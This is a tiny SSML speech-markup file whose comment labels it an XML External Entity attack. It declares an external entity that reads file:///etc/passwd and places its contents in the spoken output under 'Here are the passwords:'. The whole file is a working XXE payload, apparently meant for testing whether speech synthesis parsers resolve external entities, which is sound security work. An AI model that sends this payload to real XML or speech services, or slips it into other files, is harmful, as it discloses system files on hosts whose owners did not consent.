<?xml version="1.0"?>
<!-- SSML version of the “XML External Entity” attack
     https://en.wikipedia.org/wiki/XML_external_entity_attack
-->
<!DOCTYPE test [ 
    <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> 
]>
<speak version="1.1" xmlns="http://www.w3.org/2001/10/synthesis"
       xml:lang="en-US">
  <p>Here are the passwords:</p>
  <p>&xxeattack;</p>
</speak>
